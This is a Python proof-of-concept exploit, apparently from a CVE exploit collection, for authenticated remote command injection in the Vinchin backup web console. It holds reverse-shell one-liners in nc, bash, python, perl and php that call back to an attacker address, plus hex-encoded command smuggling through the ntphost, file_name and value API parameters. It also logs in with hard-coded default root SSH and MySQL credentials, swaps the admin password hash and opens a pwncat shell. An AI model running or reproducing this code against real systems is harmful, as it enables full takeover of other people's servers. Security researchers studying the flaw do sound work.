4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / exploit.py PY
import re
import sys
import time
import json
import random
import string
import socket
import hashlib
import requests
import binascii
import argparse
import threading
import pwncat.manager
import mysql.connector

from packaging import version
from selenium import webdriver
from rich.console import Console
from urllib.parse import urlparse
from fake_useragent import UserAgent
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.support.ui import WebDriverWait
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support import expected_conditions as EC
from requests.packages.urllib3.exceptions import InsecureRequestWarning


class VinchinRCE:
    """Proof-of-concept driver for an authenticated command injection in the Vinchin web console.

    Intended for authorized security testing only.  The object owns a headless
    Chrome session (created in ``__init__``), logs in through the web form and
    then delivers a shell command through one of four request paths selected
    by ``payload_type``.
    """

    def __init__(
        self,
        url: str,
        payload: str,
        username: str,
        password: str,
        rshell_ip: str,
        rshell_port: str,
        payload_type: str,
    ):
        """Store the target settings, start the browser and build the command.

        Args:
            url: Base URL of the target login page.
            payload: Key into ``self.payloads`` ("nc", "bash", "python",
                "perl" or "php"); any other key raises ``KeyError``.
            username: Web-console account name.
            password: Web-console account password.
            rshell_ip: Address the reverse shell connects back to; also the
                address ``start_listener`` binds to.
            rshell_port: Port for the reverse shell, kept as a string.
            payload_type: Name of the delivery method dispatched by ``login``.
        """
        self.url = url
        self.username = username
        self.password = password
        # Hash of the account's previous password; set by manage_db_password("change").
        self.old_password = None
        self.rshell_ip = rshell_ip
        self.rshell_port = rshell_port
        self.payload_type = payload_type
        self.revshell_connected = False
        self.user_agent = UserAgent().random

        # Hard-coded database credentials.
        # NOTE(review): presumably the product's factory defaults - confirm.
        self.db_user = "vinchin"
        self.db_password = "yunqi123456"
        self.db_name = "vinchin_db"

        # Hard-coded SSH credentials used by root_ssh().
        # NOTE(review): presumably the product's factory defaults - confirm.
        self.root_user = "root"
        self.root_password = "Backup@3R"

        # Order matters: setup_driver() calls custom_print() (needs self.console)
        # and reads self.user_agent, so both must be assigned before it runs.
        self.console = Console()
        self.driver = self.setup_driver()
        # One reverse-shell one-liner per supported interpreter, all pointing
        # at rshell_ip:rshell_port.
        self.payloads = {
            "nc": f"nc -e /bin/bash {self.rshell_ip} {self.rshell_port}",
            "bash": f"bash -i >& /dev/tcp/{self.rshell_ip}/{self.rshell_port} 0>&1",
            "python": (
                f"python -c 'import os,pty,socket;"
                f's=socket.socket();s.connect(("{self.rshell_ip}",{self.rshell_port}));'
                f"[os.dup2(s.fileno(),f) for f in (0, 1, 2)];"
                f'pty.spawn("bash")\''
            ),
            "perl": (
                f'perl -e \'use Socket;$i="{self.rshell_ip}";$p={self.rshell_port};'
                f'socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));'
                f"if(connect(S,sockaddr_in($p,inet_aton($i)))){{"
                f'open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");'
                f'exec("bash -i");}};\''
            ),
            "php": (
                f'php -r \'$sock=fsockopen("{self.rshell_ip}",{self.rshell_port});'
                f'$proc=proc_open("bash", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);\''
            ),
        }

        self.payload = self.construct_command(self.payloads[payload])
        # send_http_request() posts with verify=False; silence the resulting warning.
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

    @staticmethod
    def construct_command(payload: str) -> str:
        """Wrap ``payload`` as a hex-escaped ``echo -e ... | bash`` command.

        Each byte of the UTF-8 encoded payload becomes a backslash-x escape
        followed by its two hex digits, and the result is placed between
        ``;echo -e `` and ``|bash;``.

        Args:
            payload: Shell command to encode.

        Returns:
            The wrapped command string.
        """
        hex_encoded_payload = binascii.hexlify(payload.encode()).decode()
        # Split the hex string into byte-sized pairs and prefix each with "\x".
        formatted_payload = "".join(
            [
                "\\x" + hex_encoded_payload[i : i + 2]
                for i in range(0, len(hex_encoded_payload), 2)
            ]
        )
        command = f";echo -e {formatted_payload}|bash;"
        return command

    def check_vinchin_version(self, page_html: str) -> None:
        """Extract the build number from the login page and stop if out of range.

        Returns normally only when the detected version falls inside one of
        the half-open ranges in ``vulnerable_versions``.  In every other case
        (no page, no version string, version outside the ranges) a message is
        printed and the process exits with status 1.

        Args:
            page_html: HTML source of the login page, or ``None``.
        """
        if page_html is None:
            self.custom_print("Failed to connect to the target.", "-")
            sys.exit(1)

        # Requires four dot-separated numeric components after "Vinchin build: ".
        version_pattern = r"Vinchin build: (\d+\.\d+\.\d+\.\d+)"
        version_match = re.search(version_pattern, page_html)

        if not version_match:
            self.custom_print("Unable to extract version.", "-")
            sys.exit(1)

        detected_version = version.parse(version_match.group(1))
        self.custom_print(f"Detected Vinchin version: {detected_version}", "*")

        # (inclusive lower bound, exclusive upper bound) pairs.
        vulnerable_versions = [
            (version.parse("5.0.0"), version.parse("5.1.0")),
            (version.parse("6.0.0"), version.parse("6.1.0")),
            (version.parse("6.7.0"), version.parse("6.8.0")),
            (version.parse("7.0.0"), version.parse("7.3.0")),
        ]

        for low, high in vulnerable_versions:
            if low <= detected_version < high:
                self.custom_print(
                    f"Vinchin version {detected_version} is vulnerable.", "+"
                )
                return

        self.custom_print(f"Vinchin version {detected_version} is not vulnerable.", "-")
        sys.exit(1)

    def manage_db_password(self, action: str) -> None:
        """Change or restore the web account's password hash directly in MySQL.

        Connects to the database on the URL's hostname with the hard-coded
        credentials from ``__init__``.

        * ``"change"``: reads the current hash for ``self.username``, stores a
          new MD5 hash of a random 10-character password, remembers the old
          hash in ``self.old_password``, commits, then calls ``login()``.
        * ``"restore"``: writes ``self.old_password`` back and commits.
        * anything else: prints "Unknown action".

        On a ``mysql.connector.Error`` the failure is printed and ``login()``
        is called.  The cursor and connection are closed in all cases.

        Args:
            action: ``"change"`` or ``"restore"``.
        """
        parsed_url = urlparse(self.url)
        self.db_host = parsed_url.hostname

        connection = None
        cursor = None
        original_hash = None

        try:
            connection = mysql.connector.connect(
                host=self.db_host,
                user=self.db_user,
                password=self.db_password,
                database=self.db_name,
                connection_timeout=5,
            )
            cursor = connection.cursor()

            match action:
                case "change":
                    new_password = "".join(
                        random.choices(string.ascii_letters + string.digits, k=10)
                    )
                    new_hash = hashlib.md5(new_password.encode()).hexdigest()

                    # Save the existing hash first so it can be put back later.
                    cursor.execute(
                        "SELECT password FROM bd_user WHERE user_name = %s",
                        (self.username,),
                    )
                    result = cursor.fetchone()
                    original_hash = result[0] if result else None

                    cursor.execute(
                        "UPDATE bd_user SET password = %s WHERE user_name = %s",
                        (new_hash, self.username),
                    )
                    self.password = new_password
                    self.old_password = original_hash
                    self.custom_print(
                        f"Password for user '{self.username}' changed to {new_password}.",
                        "+",
                    )
                    connection.commit()
                    # login() runs while this connection is still open; it is
                    # closed by the finally block after login() returns.
                    self.login()

                case "restore":
                    cursor.execute(
                        "UPDATE bd_user SET password = %s WHERE user_name = %s",
                        (self.old_password, self.username),
                    )
                    # NOTE(review): self.old_password holds the stored hash, so
                    # self.password becomes a hash here, not a plaintext password.
                    self.password = self.old_password
                    self.custom_print(
                        f"Restored the original password for user '{self.username}'.",
                        "+",
                    )
                    connection.commit()

                case _:
                    self.custom_print(f"Unknown action: {action}", "-")

        except mysql.connector.Error as error:
            self.custom_print(f"Failed to {action} the password: {error}", "-")
            # NOTE(review): original_hash is the value read from the password
            # column; assigning it to self.password makes login() type the hash
            # into the form.  Looks unintended - confirm.
            if action == "change" and original_hash:
                self.password = original_hash
            else:
                self.custom_print(
                    f"Attempting to log in with the original credentials: user={self.username}, password={self.password}",
                    "!",
                )
            # NOTE(review): runs for every action, including a failed "restore",
            # which is itself invoked from login() - verify this cannot loop.
            self.login()

        finally:
            if cursor:
                cursor.close()
            if connection and connection.is_connected():
                connection.close()

    def setup_driver(self) -> webdriver.Chrome:
        """Create the headless Chrome WebDriver used for all browser steps.

        The browser ignores certificate errors, runs headless, sends
        ``self.user_agent`` and uses a 1366x768 window.

        NOTE(review): no method of this class calls ``quit()`` on the driver;
        the caller is responsible for shutting it down.

        Returns:
            The started ``webdriver.Chrome`` instance.
        """
        self.custom_print("Initializing WebDriver...", "*")

        self.custom_print("Configuring Chrome options...", "*")
        options = Options()
        options.add_argument("--ignore-certificate-errors")
        options.add_argument("--headless")
        options.add_argument(f"user-agent={self.user_agent}")

        self.custom_print("Setting up WebDriver service...", "*")
        # presumably downloads/caches a matching chromedriver binary - see
        # webdriver_manager documentation.
        service = Service(ChromeDriverManager().install())

        self.custom_print("Launching Chrome browser...", "*")
        driver = webdriver.Chrome(service=service, options=options)
        driver.set_window_size(1366, 768)

        return driver

    def custom_print(self, message: str, header: str) -> None:
        """Print ``message`` prefixed with a coloured ``[header]`` tag.

        Args:
            message: Text to print.
            header: One of ``"+"``, ``"-"``, ``"!"``, ``"*"``; any other value
                raises ``KeyError`` from the colour lookup.
        """
        header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"}
        self.console.print(
            f"[bold {header_colors[header]}][{header}][/bold {header_colors[header]}] {message}"
        )

    def start_listener(self, timeout: int = 30) -> None:
        """Listen for one inbound connection and hand it to pwncat.

        Binds to ``(self.rshell_ip, int(self.rshell_port))`` and waits up to
        ``timeout`` seconds.  On connection, sets ``self.revshell_connected``
        and opens an interactive pwncat session over the accepted socket.  On
        timeout, prints a message and returns.

        Args:
            timeout: Seconds to wait for the connection.
        """
        with socket.create_server((self.rshell_ip, int(self.rshell_port))) as listener:
            listener.settimeout(timeout)
            self.custom_print(
                f"Waiting for incoming connection on port {self.rshell_port}...", "*"
            )

            try:
                victim, victim_addr = listener.accept()
                self.revshell_connected = True
                self.custom_print(
                    f"Received connection from {victim_addr[0]}:{victim_addr[1]}", "+"
                )

                with pwncat.manager.Manager() as manager:
                    manager.create_session(
                        platform="linux", protocol="socket", client=victim
                    )
                    self.custom_print("Dropping to pwncat prompt...", "+")
                    manager.interactive()
            except socket.timeout:
                self.custom_print(
                    f"No reverse shell connection received within {timeout} seconds.",
                    "-",
                )

    def root_ssh(self) -> bool:
        """Try an SSH login with the hard-coded root credentials.

        The SSH host is the hostname component of ``self.url``.

        Returns:
            ``True`` after a session was created and the interactive prompt
            has ended; ``False`` if any exception occurred.
        """
        self.custom_print("Attempting SSH connection...", "*")
        try:
            parsed_url = urlparse(self.url)
            ssh_target = parsed_url.hostname

            with pwncat.manager.Manager() as manager:
                manager.create_session(
                    platform="linux",
                    protocol="ssh",
                    host=ssh_target,
                    user=self.root_user,
                    password=self.root_password,
                    timeout=5,
                )

                self.custom_print(
                    "SSH connection successful, entering interactive mode.", "+"
                )
                manager.interactive()

            return True

        except Exception as e:
            # Broad on purpose: any failure here just means "fall back to the
            # web path", which the caller does when this returns False.
            self.custom_print(f"SSH connection failed: {e}", "-")
            return False

    def login(self) -> None:
        """Log in through the web form and, on success, dispatch the delivery method.

        Success is detected indirectly: two seconds after submitting, the
        element with class ``my_alert`` is looked up.  If it is missing
        (``NoSuchElementException``) the login is treated as successful, the
        original password hash is restored when one was saved, and the method
        named by ``self.payload_type`` is called.  If the alert is present and
        its style contains ``display: block;`` the process exits with status 1.

        NOTE(review): when the alert element exists but is not displayed, this
        method returns without reporting success or failure - confirm intent.
        """
        try:
            self.driver.get(self.url)

            page_html = self.driver.page_source

            # May call sys.exit(1); SystemExit is not an Exception subclass, so
            # it is not intercepted by the handlers below.
            self.check_vinchin_version(page_html)

            self.custom_print("Waiting for the username input field...", "*")
            username_input = WebDriverWait(self.driver, 10).until(
                EC.presence_of_element_located((By.NAME, "username"))
            )

            self.custom_print("Waiting for the password input field...", "*")
            password_input = WebDriverWait(self.driver, 10).until(
                EC.presence_of_element_located((By.NAME, "password"))
            )

            self.custom_print("Waiting for the submit button...", "*")
            submit_button = WebDriverWait(self.driver, 10).until(
                EC.element_to_be_clickable((By.ID, "login-btn"))
            )

            self.custom_print("Sending username and password...", "*")
            username_input.send_keys(self.username)
            password_input.send_keys(self.password)

            self.custom_print("Submitting the form...", "*")
            submit_button.click()

            # Fixed pause to let the page react before checking for the alert.
            time.sleep(2)

            error_alert = self.driver.find_element(By.CLASS_NAME, "my_alert")
            if "display: block;" in error_alert.get_attribute("style"):
                self.custom_print(
                    "Login failed due to an error alert on the page.", "-"
                )
                sys.exit(1)

        except NoSuchElementException:
            # Success path.  NOTE(review): this handler covers the whole try
            # body, not only the find_element call above.
            self.custom_print("Logged In!", "+")
            self.manage_db_password("restore") if self.old_password else None
            self.custom_print(f"Using {self.payload_type} exploitation method !", "+")
            match self.payload_type:
                case "setNetworkCardInfo":
                    self.setNetworkCardInfo()
                case "syncNtpTime":
                    self.syncNtpTime()
                case "deleteUpdateAPK":
                    self.deleteUpdateAPK()
                case "getVerifydiyResult":
                    self.getVerifydiyResult()

        except Exception as e:
            self.custom_print(f"An error occurred during login: {e}", "-")
            # Put the saved hash back before giving up.
            self.manage_db_password("restore") if self.old_password else None
            sys.exit(1)

    def send_http_request(self, function_name: str, params: dict, module: str) -> None:
        """POST an API call to ``{self.url}/api/`` using the browser's cookies.

        The form body carries ``m`` (module), ``f`` (function name) and ``p``
        (``params`` serialised as JSON).  The response is discarded.

        Args:
            function_name: Value for the ``f`` field.
            params: Dictionary serialised into the ``p`` field.
            module: Value for the ``m`` field.
        """
        # Reuse the authenticated session established in the browser.
        cookies = self.driver.get_cookies()
        session = requests.Session()
        cookie_dict = {cookie["name"]: cookie["value"] for cookie in cookies}

        data = {"m": module, "f": function_name, "p": json.dumps(params)}

        headers = {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": self.user_agent,
            "Origin": self.url,
        }

        try:
            session.post(
                f"{self.url}/api/",
                headers=headers,
                cookies=cookie_dict,
                data=data,
                verify=False,
                timeout=5,
            )

        except requests.exceptions.Timeout:
            # Deliberately ignored.  NOTE(review): presumably because the
            # request hangs while the injected command runs - confirm.
            pass

        except requests.exceptions.RequestException as e:
            self.custom_print(f"An error occurred: {e}", "-")

    def setNetworkCardInfo(self) -> None:
        """Deliver the command through the network-settings form in the browser.

        Clicks through system management, setting manager and the network
        settings link, overwrites the text of the first located ``networkcard``
        option with ``self.payload``, then clicks the ``ipsubmit`` button.
        """
        self.custom_print("Navigating to system management...", "*")
        system_link = WebDriverWait(self.driver, 10).until(
            EC.element_to_be_clickable((By.NAME, "sysmanagement"))
        )
        system_link.click()

        self.custom_print("Navigating to setting manager...", "*")
        setting_manager_link = WebDriverWait(self.driver, 10).until(
            EC.element_to_be_clickable((By.NAME, "setting_manager"))
        )
        setting_manager_link.click()

        self.custom_print("Navigating to network settings...", "*")
        network_settings_link = WebDriverWait(self.driver, 10).until(
            EC.element_to_be_clickable(
                (By.XPATH, "//a[contains(@href, 'system_network.php')]")
            )
        )
        network_settings_link.click()

        self.custom_print(
            f"Injecting payload for reverse shell: {self.rshell_ip}:{self.rshell_port}...",
            "*",
        )
        networkcard_option = WebDriverWait(self.driver, 10).until(
            EC.presence_of_element_located(
                (By.XPATH, "//select[@name='networkcard']/option")
            )
        )
        # Rewrite the option's text in the DOM so the form submits the command
        # in place of the interface name.
        self.driver.execute_script(
            "arguments[0].innerText = arguments[1]", networkcard_option, self.payload
        )

        self.custom_print("Submitting the network settings form...", "*")
        ok_button = WebDriverWait(self.driver, 15).until(
            EC.element_to_be_clickable((By.ID, "ipsubmit"))
        )

        ok_button.click()

        self.custom_print("Check your listener h4x0rm4n...", "+")

    def syncNtpTime(self) -> None:
        """Deliver the command via the ``syncNtpTime`` API call (module "8").

        The command is appended to the ``ntphost`` parameter.
        """
        params = {"ntphost": f"time.nist.gov {self.payload}"}
        self.send_http_request("syncNtpTime", params, "8")

    def deleteUpdateAPK(self) -> None:
        """Deliver the command via the ``deleteUpdateAPK`` API call (module "8").

        The command is sent as the ``file_name`` parameter.
        """
        params = {"md5": "h4x0rm4n", "file_name": self.payload}
        self.send_http_request("deleteUpdateAPK", params, "8")

    def getVerifydiyResult(self) -> None:
        """Deliver the command via the ``getVerifydiyResult`` API call (module "14").

        The command is appended to the ``value`` parameter.
        """
        params = {"type": "1", "value": f"127.0.0.1 {self.payload}"}
        self.send_http_request("getVerifydiyResult", params, "14")


def main() -> None:
    """Parse the command line and run the proof of concept once.

    Intended for authorized security testing only.

    Flow: build a ``VinchinRCE`` (which starts a headless Chrome session),
    try the SSH path first, and only if that fails start the listener thread
    and go through the web login path.  The browser is always shut down
    before returning or exiting, so no Chrome/chromedriver process is left
    behind.
    """
    parser = argparse.ArgumentParser(description="Authenticated RCE on VinChin 7.2.")
    parser.add_argument(
        "-u",
        "--url",
        default="https://192.168.1.7",
        help="URL of the login page",
    )
    parser.add_argument(
        "-user", "--username", default="admin", help="Username for login"
    )
    parser.add_argument(
        "-p", "--password", default="123456", help="Password for login"
    )
    parser.add_argument(
        "-rip", "--rshell_ip", default="192.168.1.5", help="Reverse shell IP address"
    )
    parser.add_argument(
        "-rport", "--rshell_port", default="1338", help="Reverse shell port"
    )
    parser.add_argument(
        "--payload_type",
        default="syncNtpTime",
        choices=[
            "setNetworkCardInfo",
            "syncNtpTime",
            "deleteUpdateAPK",
            "getVerifydiyResult",
        ],
        help="Type of payload to send",
    )
    parser.add_argument(
        "--payload",
        choices=["nc", "bash", "python", "perl", "php"],
        default="nc",
        help="Type of payload to use (choices: 'nc', 'bash', 'python', 'perl', 'php'), default='nc'",
    )

    args = parser.parse_args()

    vinchin_rce = VinchinRCE(
        args.url,
        args.payload,
        args.username,
        args.password,
        args.rshell_ip,
        args.rshell_port,
        args.payload_type,
    )

    try:
        if not vinchin_rce.root_ssh():
            # Daemon thread: if the login path calls sys.exit(), the listener
            # must not keep the process alive.
            listener_thread = threading.Thread(target=vinchin_rce.start_listener)
            listener_thread.daemon = True
            listener_thread.start()

            vinchin_rce.manage_db_password("change")
            # Wait for the listener to finish (session ended or timed out).
            listener_thread.join()
    finally:
        # The constructor launched a browser; release it on every exit path,
        # including SystemExit raised from the login/version checks.
        vinchin_rce.driver.quit()


# Run the command-line entry point only when executed as a script, not on import.
if __name__ == "__main__":
    main()